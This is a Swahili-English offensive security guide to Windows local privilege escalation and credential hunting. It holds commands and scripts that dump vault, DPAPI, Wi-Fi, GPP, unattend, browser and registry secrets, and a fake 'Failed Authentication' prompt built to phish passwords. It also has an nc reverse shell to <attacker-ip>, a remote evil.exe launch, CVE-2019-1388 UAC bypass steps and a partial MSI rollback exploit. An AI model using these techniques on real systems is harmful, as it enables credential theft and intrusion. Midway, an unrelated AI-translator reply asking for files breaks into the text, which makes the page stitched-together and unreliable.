Windows Vault inahifadhi credentials za watumiaji kwa seva, tovuti na programu nyingine ambazo Windows inaweza kuingia kwa watumiaji moja kwa moja. Kwa mwonekano wa kwanza, inaweza kuonekana kwamba watumiaji wanaweza kuhifadhi Facebook credentials, Twitter credentials, Gmail credentials n.k., ili kuingia moja kwa moja kupitia browsers. Lakini si hivyo.
Windows Vault inahifadhi credentials ambazo Windows inaweza kuzitumia kuingia kwa watumiaji moja kwa moja, ambayo ina maana kwamba programu yoyote ya programu za Windows zinazohitaji credentials kupata rasilimali (server au tovuti) zinaweza kutumia Credential Manager & Windows Vault na kutumia credentials zilizotolewa badala ya watumiaji kuandika username na password kila wakati.
Isipokuwa programu zinavyoshirikiana na Credential Manager, sipati kuwa zinaweza kutumia credentials za rasilimali fulani. Kwa hivyo, ikiwa programu yako inataka kutumia vault, inapaswa kwa namna fulani wasiliane na Credential Manager na kuomba credentials za rasilimali hiyo kutoka kwa vault ya hifadhi ya chaguo-msingi.
Tumia cmdkey ili kuorodhesha credentials zilizohifadhiwa kwenye mashine.
cmdkey /list
Currently stored credentials:
Target: Domain:interactive=WORKGROUP\Administrator
Type: Domain Password
User: WORKGROUP\Administrator
Kisha unaweza kutumia runas kwa chaguo la /savecred ili kutumia saved credentials. Mfano ufuatao unaitisha remote binary kupitia SMB share.
runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe"
Kutumia runas na seti ya taarifa za uthibitisho iliyotolewa.
C:\Windows\System32\runas.exe /env /noprofile /user:<username> <password> "c:\users\Public\nc.exe -nc <attacker-ip> 4444 -e cmd.exe"
Kumbuka kwamba mimikatz, lazagne, credentialfileview, VaultPasswordView, au kutoka kwa Empire Powershells module.
DPAPI
The Data Protection API (DPAPI) inatoa njia ya ufichaji wa data kwa kutumia ufunguo wa simetriki, unatumiwa hasa ndani ya mfumo wa uendeshaji wa Windows kwa ajili ya ufichaji wa ufunguo binafsi wa asymmetric. Ufungaji huu unategemea siri ya mtumiaji au ya mfumo ili kuchangia kwa kiasi kikubwa entropia.
DPAPI inawezesha ufichaji wa funguo kupitia ufunguo wa simetriki unaotokana na siri za kuingia (login) za mtumiaji. Katika matukio yanayohusisha ufichaji wa mfumo, inatumia siri za uthibitishaji za domain ya mfumo.
Ufunguo wa RSA wa mtumiaji uliofichwa kwa kutumia DPAPI huhifadhiwa katika saraka %APPDATA%\Microsoft\Protect{SID}, ambapo {SID} inaashiria Security Identifier ya mtumiaji. Funguao la DPAPI, linaloshirikiwa na ufunguo mkuu unaolinda funguo binafsi za mtumiaji katika faili hiyo hiyo, kwa kawaida linajumuisha 64 bytes za data za nasibu. (Ni muhimu kutambua kwamba ufikiaji wa saraka hii umewekewa vikwazo, ukizuia kuorodhesha yaliyomo kwa kutumia amri ya dir katika CMD, ingawa inaweza kuorodheshwa kupitia PowerShell).
Get-ChildItem C:\Users\USER\AppData\Roaming\Microsoft\Protect\
Get-ChildItem C:\Users\USER\AppData\Local\Microsoft\Protect\
Unaweza kutumia mimikatz module dpapi::masterkey kwa hoja zinazofaa (/pvk au /rpc) ili kui-decrypt.
Kwa kawaida, credentials files protected by the master password ziko katika:
dir C:\Users\username\AppData\Local\Microsoft\Credentials\
dir C:\Users\username\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\
Unaweza kutumia mimikatz module dpapi::cred pamoja na /masterkey inayofaa ili ku-decrypt.
Unaweza extract many DPAPI masterkeys kutoka memory kwa kutumia module sekurlsa::dpapi (kama wewe ni root).
PowerShell Credentials
PowerShell credentials mara nyingi hutumiwa kwa ajili ya scripting na automation tasks kama njia ya kuhifadhi encrypted credentials kwa urahisi. Credentials hizi zinalindwa kwa kutumia DPAPI, ambayo kwa kawaida ina maana kwamba zinaweza ku-decryptwa tu na mtumiaji yule yule kwenye kompyuta ile ile zilipotengenezwa.
Ili decrypt PS credentials kutoka kwenye faili inayoiweka unaweza kufanya:
PS C:\> $credential = Import-Clixml -Path 'C:\pass.xml'
PS C:\> $credential.GetNetworkCredential().username
john
PS C:\htb> $credential.GetNetworkCredential().password
JustAPWD!
Wifi
#List saved Wifi using
netsh wlan show profile
#To get the clear-text password use
netsh wlan show profile <SSID> key=clear
#Oneliner to extract all wifi passwords
cls & echo. & for /f "tokens=3,* delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name="%b" key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on*
Muunganisho za RDP zilizohifadhiwa
Unaweza kuzipata kwenye HKEY_USERS\<SID>\Software\Microsoft\Terminal Server Client\Servers\\
na katika HKCU\Software\Microsoft\Terminal Server Client\Servers\
Amri zilizotekelezwa hivi karibuni
HCU\<SID>\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
HKCU\<SID>\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
Meneja wa Cheo za Remote Desktop
%localappdata%\Microsoft\Remote Desktop Connection Manager\RDCMan.settings
Tumia Mimikatz dpapi::rdg module na /masterkey inayofaa ili kuvunjua usimbuaji wa faili zozote za .rdg
Unaweza kutoa masterkeys nyingi za DPAPI kutoka kwenye kumbukumbu kwa kutumia Mimikatz sekurlsa::dpapi module
Sticky Notes
Watu mara nyingi hutitumia app ya StickyNotes kwenye workstations za Windows kuhifadhi nywila na taarifa nyingine, bila kutambua kuwa ni faili ya database. Faili hii iko kwenye C:\Users\<user>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite na daima inastahili kutafutwa na kuchunguzwa.
AppCmd.exe
Kumbuka kwamba ili kurejesha nywila kutoka AppCmd.exe unahitaji kuwa Administrator na kuendesha kwa kiwango cha High Integrity.
AppCmd.exe iko katika saraka %systemroot%\system32\inetsrv\.\
Iwapo faili hii ipo basi kuna uwezekano kwamba baadhi ya credentials zimetayarishwa na zinaweza kurejeshwa.
Msimbo huu ulichukuliwa kutoka kwa PowerUP:
function Get-ApplicationHost {
$OrigError = $ErrorActionPreference
$ErrorActionPreference = "SilentlyContinue"
# Check if appcmd.exe exists
if (Test-Path ("$Env:SystemRoot\System32\inetsrv\appcmd.exe")) {
# Create data table to house results
$DataTable = New-Object System.Data.DataTable
# Create and name columns in the data table
$Null = $DataTable.Columns.Add("user")
$Null = $DataTable.Columns.Add("pass")
$Null = $DataTable.Columns.Add("type")
$Null = $DataTable.Columns.Add("vdir")
$Null = $DataTable.Columns.Add("apppool")
# Get list of application pools
Invoke-Expression "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppools /text:name" | ForEach-Object {
# Get application pool name
$PoolName = $_
# Get username
$PoolUserCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppool " + "`"$PoolName`" /text:processmodel.username"
$PoolUser = Invoke-Expression $PoolUserCmd
# Get password
$PoolPasswordCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppool " + "`"$PoolName`" /text:processmodel.password"
$PoolPassword = Invoke-Expression $PoolPasswordCmd
# Check if credentials exists
if (($PoolPassword -ne "") -and ($PoolPassword -isnot [system.array])) {
# Add credentials to database
$Null = $DataTable.Rows.Add($PoolUser, $PoolPassword,'Application Pool','NA',$PoolName)
}
}
# Get list of virtual directories
Invoke-Expression "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir /text:vdir.name" | ForEach-Object {
# Get Virtual Directory Name
$VdirName = $_
# Get username
$VdirUserCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir " + "`"$VdirName`" /text:userName"
$VdirUser = Invoke-Expression $VdirUserCmd
# Get password
$VdirPasswordCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir " + "`"$VdirName`" /text:password"
$VdirPassword = Invoke-Expression $VdirPasswordCmd
# Check if credentials exists
if (($VdirPassword -ne "") -and ($VdirPassword -isnot [system.array])) {
# Add credentials to database
$Null = $DataTable.Rows.Add($VdirUser, $VdirPassword,'Virtual Directory',$VdirName,'NA')
}
}
# Check if any passwords were found
if( $DataTable.rows.Count -gt 0 ) {
# Display results in list view that can feed into the pipeline
$DataTable | Sort-Object type,user,pass,vdir,apppool | Select-Object user,pass,type,vdir,apppool -Unique
}
else {
# Status user
Write-Verbose 'No application pool or virtual directory passwords were found.'
$False
}
}
else {
Write-Verbose 'Appcmd.exe does not exist in the default location.'
$False
}
$ErrorActionPreference = $OrigError
}
SCClient / SCCM
Kagua kama C:\Windows\CCM\SCClient.exe ipo.
Mafaili ya kusakinisha huendeshwa kwa SYSTEM privileges, nyingi zina udhaifu kwa DLL Sideloading (Taarifa kutoka https://github.com/enjoiz/Privesc).
$result = Get-WmiObject -Namespace "root\ccm\clientSDK" -Class CCM_Application -Property * | select Name,SoftwareVersion
if ($result) { $result }
else { Write "Not Installed." }
Faili na Registry (Credentials)
Putty Creds
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s | findstr "HKEY_CURRENT_USER HostName PortNumber UserName PublicKeyFile PortForwardings ConnectionSharing ProxyPassword ProxyUsername" #Check the values saved in each session, user/password could be there
Putty SSH Vifunguo vya Mwenyeji
reg query HKCU\Software\SimonTatham\PuTTY\SshHostKeys\
SSH keys in registry
SSH private keys zinaweza kuhifadhiwa ndani ya funguo ya registry HKCU\Software\OpenSSH\Agent\Keys, kwa hivyo unapaswa kuangalia kama kuna kitu chochote cha kuvutia huko:
reg query 'HKEY_CURRENT_USER\Software\OpenSSH\Agent\Keys'
Kama utapata rekodi yoyote ndani ya njia hiyo, kuna uwezekano ni SSH key iliyohifadhiwa. Imehifadhiwa encrypted lakini inaweza kufunguliwa kwa urahisi (decrypted) kwa kutumia https://github.com/ropnop/windows_sshagent_extract.
More information about this technique here: https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent/
Kama ssh-agent service haifanyi kazi na unataka ianze moja kwa moja wakati wa boot, endesha:
Get-Service ssh-agent | Set-Service -StartupType Automatic -PassThru | Start-Service
tip
Inaonekana mbinu hii haitumiki tena. Nilijaribu kuunda ssh keys, kuziweka kwa ssh-add na kuingia kwa ssh kwenye mashine. Rejista HKCU\Software\OpenSSH\Agent\Keys haipo na procmon haikutambua matumizi ya dpapi.dll wakati wa asymmetric key authentication.
Faili zisizohudumiwa
C:\Windows\sysprep\sysprep.xml
C:\Windows\sysprep\sysprep.inf
C:\Windows\sysprep.inf
C:\Windows\Panther\Unattended.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\Panther\Unattend\Unattended.xml
C:\Windows\System32\Sysprep\unattend.xml
C:\Windows\System32\Sysprep\unattended.xml
C:\unattend.txt
C:\unattend.inf
dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul
Unaweza pia kutafuta faili hizi kwa kutumia metasploit: post/windows/gather/enum_unattend
Mfano wa yaliyomo:
<component name="Microsoft-Windows-Shell-Setup" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" processorArchitecture="amd64">
<AutoLogon>
<Password>U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo==</Password>
<Enabled>true</Enabled>
<Username>Administrateur</Username>
</AutoLogon>
<UserAccounts>
<LocalAccounts>
<LocalAccount wcm:action="add">
<Password>*SENSITIVE*DATA*DELETED*</Password>
<Group>administrators;users</Group>
<Name>Administrateur</Name>
</LocalAccount>
</LocalAccounts>
</UserAccounts>
SAM & SYSTEM chelezo
# Usually %SYSTEMROOT% = C:\Windows
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system
Vyeti vya Wingu
#From user home
.aws\credentials
AppData\Roaming\gcloud\credentials.db
AppData\Roaming\gcloud\legacy_credentials
AppData\Roaming\gcloud\access_tokens.db
.azure\accessTokens.json
.azure\azureProfile.json
McAfee SiteList.xml
Tafuta faili liitwalo SiteList.xml
Nenosiri la GPP lililohifadhiwa
Kipengele kilikuwa kimepatikana hapo awali kilichoruhusu ugawaji wa akaunti za msimamizi wa eneo zilizoundwa maalum kwenye kundi la mashine kupitia Group Policy Preferences (GPP). Hata hivyo, njia hii ilikuwa na mapungufu makubwa ya usalama. Kwanza, Group Policy Objects (GPOs), zilizohifadhiwa kama faili za XML ndani ya SYSVOL, zingeweza kufikiwa na mtumiaji yeyote wa domain. Pili, nywila ndani ya GPP hizi, zilizofichwa kwa AES256 kwa kutumia default key iliyotambulishwa kwa umma, zingeweza ku-decrypt na mtumiaji yeyote aliyethibitishwa. Hii ilisababisha hatari kubwa, kwani ilingeweza kumruhusu mtumiaji kupata vigezo vya juu.
Ili kupunguza hatari hii, ilitengenezwa function inayotafuta faili za GPP zilizohifadhiwa ndani zinazo na uwanja "cpassword" ambao si tupu. Baada ya kupata faili kama hiyo, function hu-decrypt nenosiri na hurudisha PowerShell object maalum. Object hii inajumuisha maelezo kuhusu GPP na eneo la faili, ikisaidia katika utambuzi na utatuzi wa udhaifu huu wa usalama.
Tafuta katika C:\ProgramData\Microsoft\Group Policy\history au katika C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\history (kabla ya Windows Vista) kwa faili hizi:
- Groups.xml
- Services.xml
- Scheduledtasks.xml
- DataSources.xml
- Printers.xml
- Drives.xml
Ili ku-decrypt cPassword:
#To decrypt these passwords you can decrypt it using
gpp-decrypt j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw
Kutumia crackmapexec kupata nywila:
crackmapexec smb 10.10.10.10 -u username -p pwd -M gpp_autologin
IIS Usanidi wa Web
Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
C:\inetpub\wwwroot\web.config
Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
Get-Childitem –Path C:\xampp\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
Mfano wa web.config yenye vitambulisho:
<authentication mode="Forms">
<forms name="login" loginUrl="/admin">
<credentials passwordFormat = "Clear">
<user name="Administrator" password="SuperAdminPassword" />
</credentials>
</forms>
</authentication>
OpenVPN maelezo ya kuingia
Add-Type -AssemblyName System.Security
$keys = Get-ChildItem "HKCU:\Software\OpenVPN-GUI\configs"
$items = $keys | ForEach-Object {Get-ItemProperty $_.PsPath}
foreach ($item in $items)
{
$encryptedbytes=$item.'auth-data'
$entropy=$item.'entropy'
$entropy=$entropy[0..(($entropy.Length)-2)]
$decryptedbytes = [System.Security.Cryptography.ProtectedData]::Unprotect(
$encryptedBytes,
$entropy,
[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
Write-Host ([System.Text.Encoding]::Unicode.GetString($decryptedbytes))
}
Faili za logi
# IIS
C:\inetpub\logs\LogFiles\*
#Apache
Get-Childitem –Path C:\ -Include access.log,error.log -File -Recurse -ErrorAction SilentlyContinue
Omba credentials
Unaweza kila wakati kumuuliza mtumiaji aingize credentials zake au hata credentials za mtumiaji mwingine ikiwa unadhani anaweza kuzijua (kumbuka kwamba kuuliza mtumiaji moja kwa moja kwa credentials ni hatari sana):
$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+[Environment]::UserName,[Environment]::UserDomainName); $cred.getnetworkcredential().password
$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+'anotherusername',[Environment]::UserDomainName); $cred.getnetworkcredential().password
#Get plaintext
$cred.GetNetworkCredential() | fl
Majina ya faili yanayoweza kuwa na vitambulisho
Faili zinazojulikana ambazo muda fulani uliopita ziliwahi kuwa na nywila katika maandishi wazi au Base64
$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history
vnc.ini, ultravnc.ini, *vnc*
web.config
php.ini httpd.conf httpd-xampp.conf my.ini my.cnf (XAMPP, Apache, PHP)
SiteList.xml #McAfee
ConsoleHost_history.txt #PS-History
*.gpg
*.pgp
*config*.php
elasticsearch.y*ml
kibana.y*ml
*.p12
*.der
*.csr
*.cer
known_hosts
id_rsa
id_dsa
*.ovpn
anaconda-ks.cfg
hostapd.conf
rsyncd.conf
cesi.conf
supervisord.conf
tomcat-users.xml
*.kdbx
KeePass.config
Ntds.dit
SAM
SYSTEM
FreeSSHDservice.ini
access.log
error.log
server.xml
ConsoleHost_history.txt
setupinfo
setupinfo.bak
key3.db #Firefox
key4.db #Firefox
places.sqlite #Firefox
"Login Data" #Chrome
Cookies #Chrome
Bookmarks #Chrome
History #Chrome
TypedURLsTime #IE
TypedURLs #IE
%SYSTEMDRIVE%\pagefile.sys
%WINDIR%\debug\NetSetup.log
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software, %WINDIR%\repair\security
%WINDIR%\iis6.log
%WINDIR%\system32\config\AppEvent.Evt
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
%WINDIR%\system32\CCM\logs\*.log
%USERPROFILE%\ntuser.dat
%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat
I don't have the files. Please either:
- Paste the content of src/windows-hardening/windows-local-privilege-escalation/README.md (and any other files you want searched), or
- Give me a list of the "proposed files" you want searched, or
- Grant a link or repo path I can access.
If you're working locally, you can list/search files with these commands (run in your repo root):
-
List files in that folder: git ls-files "src/windows-hardening/windows-local-privilege-escalation/*"
-
Search for a term across those files: git grep -n "SEARCH_TERM" -- src/windows-hardening/windows-local-privilege-escalation/
Once you provide the files or confirm which ones, I'll translate the relevant English text to Swahili, preserving markdown/html/tags/paths exactly as you specified.
cd C:\
dir /s/b /A:-D RDCMan.settings == *.rdg == *_history* == httpd.conf == .htpasswd == .gitconfig == .git-credentials == Dockerfile == docker-compose.yml == access_tokens.db == accessTokens.json == azureProfile.json == appcmd.exe == scclient.exe == *.gpg$ == *.pgp$ == *config*.php == elasticsearch.y*ml == kibana.y*ml == *.p12$ == *.cer$ == known_hosts == *id_rsa* == *id_dsa* == *.ovpn == tomcat-users.xml == web.config == *.kdbx == KeePass.config == Ntds.dit == SAM == SYSTEM == security == software == FreeSSHDservice.ini == sysprep.inf == sysprep.xml == *vnc*.ini == *vnc*.c*nf* == *vnc*.txt == *vnc*.xml == php.ini == https.conf == https-xampp.conf == my.ini == my.cnf == access.log == error.log == server.xml == ConsoleHost_history.txt == pagefile.sys == NetSetup.log == iis6.log == AppEvent.Evt == SecEvent.Evt == default.sav == security.sav == software.sav == system.sav == ntuser.dat == index.dat == bash.exe == wsl.exe 2>nul | findstr /v ".dll"
Get-Childitem –Path C:\ -Include *unattend*,*sysprep* -File -Recurse -ErrorAction SilentlyContinue | where {($_.Name -like "*.xml" -or $_.Name -like "*.txt" -or $_.Name -like "*.ini")}
Vyeti katika RecycleBin
Pia unapaswa kuangalia Bin kutafuta vyeti ndani yake
Ili kufufua nywila zilizohifadhiwa na programu kadhaa unaweza kutumia: http://www.nirsoft.net/password_recovery_tools.html
Ndani ya rejista
Vifunguo vingine vya rejista vinavyowezekana vyenye vyeti
reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP" /s
reg query "HKCU\Software\TightVNC\Server"
reg query "HKCU\Software\OpenSSH\Agent\Key"
Extract openssh keys from registry.
Historia ya Vivinjari
Unapaswa kuangalia dbs ambazo zinaweka nywila kutoka Chrome or Firefox.
Pia angalia historia, bookmarks na favourites za vivinjari kwani huenda baadhi ya nywila zimehifadhiwa pale.
Zana za kutoa nywila kutoka kwenye vivinjari:
- Mimikatz:
dpapi::chrome - SharpWeb
- SharpChromium
- SharpDPAPI
COM DLL Overwriting
Component Object Model (COM) ni teknolojia iliyojengwa ndani ya mfumo wa uendeshaji wa Windows inayoruhusu kuwasiliana kati ya vipengele vya programu vilivyoandikwa kwa lugha tofauti. Kila sehemu ya COM inatambulishwa kwa class ID (CLSID) na kila sehemu huonyesha utendakazi kupitia interface moja au zaidi, zinazotambulishwa kwa interface IDs (IIDs).
COM classes and interfaces zimefafanuliwa katika registry chini ya HKEY\CLASSES\ROOT\CLSID na HKEY\CLASSES\ROOT\Interface mtawalia. Registry hii imeundwa kwa kuchanganya HKEY\LOCAL\MACHINE\Software\Classes + HKEY\CURRENT\USER\Software\Classes = HKEY\CLASSES\ROOT.
Ndani ya CLSIDs za registry hii unaweza kupata registry ndogo InProcServer32 ambayo ina thamani ya default inayorejea kwenye DLL na thamani iitwayo ThreadingModel ambayo inaweza kuwa Apartment (Single-Threaded), Free (Multi-Threaded), Both (Single or Multi) au Neutral (Thread Neutral).
.png)
Kwa msingi, ikiwa unaweza kuandika upya (overwrite) DLL yoyote itakayotekelezwa, unaweza escalate privileges ikiwa DLL hiyo itatekelezwa na mtumiaji tofauti.
Ili kujifunza jinsi watapeli wanavyotumia COM Hijacking kama mbinu ya kudumu angalia:
Utafutaji wa nywila kwa ujumla katika faili na registry
Tafuta yaliyomo kwenye faili
cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
findstr /si password *.xml *.ini *.txt *.config
findstr /spin "password" *.*
Tafuta faili lenye jina fulani
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
where /R C:\ user.txt
where /R C:\ *.ini
Tafuta kwenye rejista majina ya funguo na nywila
REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S /K
REG QUERY HKLM /F "password" /t REG_SZ /S /d
REG QUERY HKCU /F "password" /t REG_SZ /S /d
Zana zinazotafuta passwords
MSF-Credentials Plugin is a msf plugin. Nimeunda plugin hii ili automatically execute every metasploit POST module that searches for credentials ndani ya victim.
Winpeas inatafuta kiotomatiki faili zote zenye passwords zilizotajwa kwenye ukurasa huu.
Lazagne ni zana nyingine nzuri ya kutoa password kutoka kwenye mfumo.
Zana SessionGopher inatafuta sessions, usernames na passwords za zana kadhaa ambazo zinaweka data hii kwa maandishi wazi (PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP)
Import-Module path\to\SessionGopher.ps1;
Invoke-SessionGopher -Thorough
Invoke-SessionGopher -AllDomain -o
Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss
Leaked Handlers
Imagine that a process running as SYSTEM open a new process (OpenProcess()) with ufikiaji kamili. The same process also create a new process (CreateProcess()) ikiwa na ruhusa za chini lakini ikirithi handles zote zilizofunguliwa za mchakato mkuu.\
Then, if you have ufikiaji kamili kwenye mchakato wenye ruhusa za chini, you can grab the open handle to the privileged process created with OpenProcess() and inject a shellcode.\
Read this example for more information about how to detect and exploit this vulnerability.
Read this other post for a more complete explanation on how to test and abuse more open handlers of processes and threads inherited with different levels of permissions (not only full access).
Named Pipe Client Impersonation
Shared memory segments, referred to as pipes, enable process communication and data transfer.
Windows provides a feature called Named Pipes, allowing unrelated processes to share data, even over different networks. This resembles a client/server architecture, with roles defined as named pipe server and named pipe client.
When data is sent through a pipe by a client, the server that set up the pipe has the ability to take on the identity of the client, assuming it has the necessary SeImpersonate rights. Identifying a mchakato mwenye ruhusa za juu that communicates via a pipe you can mimic provides an opportunity to pata ruhusa za juu by adopting the identity of that process once it interacts with the pipe you established. For instructions on executing such an attack, helpful guides can be found here and here.
Also the following tool allows to intercept a named pipe communication with a tool like burp: https://github.com/gabriel-sztejnworcel/pipe-intercept and this tool allows to list and see all the pipes to find privescs https://github.com/cyberark/PipeViewer
Misc
File Extensions that could execute stuff in Windows
Check out the page https://filesec.io/
Monitoring Command Lines for passwords
When getting a shell as a user, there may be scheduled tasks or other processes being executed which pass credentials on the command line. The script below captures process command lines every two seconds and compares the current state with the previous state, outputting any differences.
while($true)
{
$process = Get-WmiObject Win32_Process | Select-Object CommandLine
Start-Sleep 1
$process2 = Get-WmiObject Win32_Process | Select-Object CommandLine
Compare-Object -ReferenceObject $process -DifferenceObject $process2
}
Kuiba nywila kutoka kwa michakato
From Low Priv User to NT\AUTHORITY SYSTEM (CVE-2019-1388) / UAC Bypass
Ikiwa una ufikiaji wa kiolesura cha picha (via console or RDP) na UAC imewezeshwa, katika matoleo kadhaa ya Microsoft Windows inawezekana kuendesha terminal au mchakato mwingine wowote kama "NT\AUTHORITY SYSTEM" kutoka kwa mtumiaji asiye na ruhusa.
Hii inafanya iwezekane kuongeza viwango vya ruhusa na bypass UAC kwa wakati mmoja kwa kutumia udhaifu huo. Zaidi ya hayo, hakuna haja ya kusakinisha chochote na binary inayotumika wakati wa mchakato, imewekwa saini na kutolewa na Microsoft.
Baadhi ya mifumo iliyoathiriwa ni zifuatazo:
SERVER
======
Windows 2008r2 7601 ** link OPENED AS SYSTEM **
Windows 2012r2 9600 ** link OPENED AS SYSTEM **
Windows 2016 14393 ** link OPENED AS SYSTEM **
Windows 2019 17763 link NOT opened
WORKSTATION
===========
Windows 7 SP1 7601 ** link OPENED AS SYSTEM **
Windows 8 9200 ** link OPENED AS SYSTEM **
Windows 8.1 9600 ** link OPENED AS SYSTEM **
Windows 10 1511 10240 ** link OPENED AS SYSTEM **
Windows 10 1607 14393 ** link OPENED AS SYSTEM **
Windows 10 1703 15063 link NOT opened
Windows 10 1709 16299 link NOT opened
Ili kutumia udhaifu huu, ni lazima ufanye hatua zifuatazo:
1) Right click on the HHUPD.EXE file and run it as Administrator.
2) When the UAC prompt appears, select "Show more details".
3) Click "Show publisher certificate information".
4) If the system is vulnerable, when clicking on the "Issued by" URL link, the default web browser may appear.
5) Wait for the site to load completely and select "Save as" to bring up an explorer.exe window.
6) In the address path of the explorer window, enter cmd.exe, powershell.exe or any other interactive process.
7) You now will have an "NT\AUTHORITY SYSTEM" command prompt.
8) Remember to cancel setup and the UAC prompt to return to your desktop.
You have all the necessary files and information in the following GitHub repository:
https://github.com/jas502n/CVE-2019-1388
Kutoka Administrator Medium hadi High Integrity Level / UAC Bypass
Soma hii ili ujifunze kuhusu Integrity Levels:
Kisha soma hii ili ujifunze kuhusu UAC na UAC bypasses:
Kutoka Arbitrary Folder Delete/Move/Rename hadi SYSTEM EoP
Mbinu iliyotajwa katika chapisho hili la blogu pamoja na exploit code inapatikana hapa.
Shambulio linaanzia kwa kutumia kipengele cha rollback cha Windows Installer kubadilisha faili halali na zile zenye madhara wakati wa mchakato wa uninstall. Kwa hili mshambuliaji anahitaji kuunda MSI installer yenye madhara itakayotumika kupora folda ya C:\Config.Msi, ambayo baadaye Windows Installer itatumia kuhifadhi faili za rollback wakati wa uninstall ya vifurushi vingine vya MSI ambapo faili za rollback zingeweza kuharibiwa ili zijawe na payload ya madhara.
Mbinu kwa ufupisho ni kama ifuatavyo:
- Hatua 1 – Preparing for the Hijack (acha
C:\Config.Msitupu)
-
Hatua 1: Install the MSI
-
Tengeneza
.msiinayosakinisha faili isiyo hatari (mfano,dummy.txt) katika folda inayoweza kuandikwa (TARGETDIR). -
Taja installer kama "UAC Compliant", ili mtumiaji asiye-admin aweze kuendesha.
-
Weka handle wazi kwa faili baada ya usakinishaji.
-
Hatua 2: Begin Uninstall
-
Uninstall
.msihiyo hiyo. -
Mchakato wa uninstall unaanza kuhamisha faili kwenda
C:\Config.Msina kuzipa majina ya.rbf(rollback backups). -
Polling ya handle ya faili iliyo wazi kwa kutumia
GetFinalPathNameByHandleili kugundua wakati faili inabadilika kuwaC:\Config.Msi\<random>.rbf. -
Hatua 3: Custom Syncing
-
.msiina custom uninstall action (SyncOnRbfWritten) ambayo: -
Inatoa ishara wakati
.rbfimeandikwa. -
Kisha inasubiri tukio lingine kabla ya kuendelea na uninstall.
-
Hatua 4: Block Deletion of
.rbf -
Unapopokea ishara, ufungue faili ya
.rbfbilaFILE_SHARE_DELETE— hili linazuia ifutwe. -
Kisha rudisha ishara ili uninstall iendelee.
-
Windows Installer haitafanikiwa kufuta
.rbf, na kwa sababu haiwezi kufuta maudhui yote,C:\Config.Msihairudishwi. -
Hatua 5: Manually Delete
.rbf -
Wewe (mshambuliaji) unafuta
.rbfkwa mikono. -
Sasa
C:\Config.Msiiko tupu, tayari kuporwa.
Katika hatua hii, chochea udhaifu wa SYSTEM-level wa kufuta folda kiholela ili kufuta
C:\Config.Msi.
- Hatua 2 – Replacing Rollback Scripts with Malicious Ones
-
Hatua 6: Recreate
C:\Config.Msiwith Weak ACLs -
Unda tena folda ya
C:\Config.Msimwenyewe. -
Weka DACLs dhaifu (mfano, Everyone:F), na weka handle wazi ukiwa na
WRITE_DAC. -
Hatua 7: Run Another Install
-
Sakinisha
.msitena, ambapo: -
TARGETDIR: Mahali pa kuandikwa. -
ERROROUT: Kigezo kinachochochea kushindwa kwa lazima. -
Usakinishaji huu utatumika kuchochea rollback tena, ambayo inasoma
.rbsna.rbf. -
Hatua 8: Monitor for
.rbs -
Tumia
ReadDirectoryChangesWkufuatiliaC:\Config.Msihadi.rbsmpya itaonekana. -
Rekodi jina lake.
-
Hatua 9: Sync Before Rollback
-
.msiina custom install action (SyncBeforeRollback) ambayo: -
Inatoa ishara tukio linapotengenezwa
.rbs. -
Kisha inasubiri kabla ya kuendelea.
-
Hatua 10: Reapply Weak ACL
-
Baada ya kupokea tukio la
.rbs created: -
Windows Installer inarudisha ACL kali kwa
C:\Config.Msi. -
Lakini kwa kuwa bado una handle yenye
WRITE_DAC, unaweza kurudisha ACL dhaifu tena.
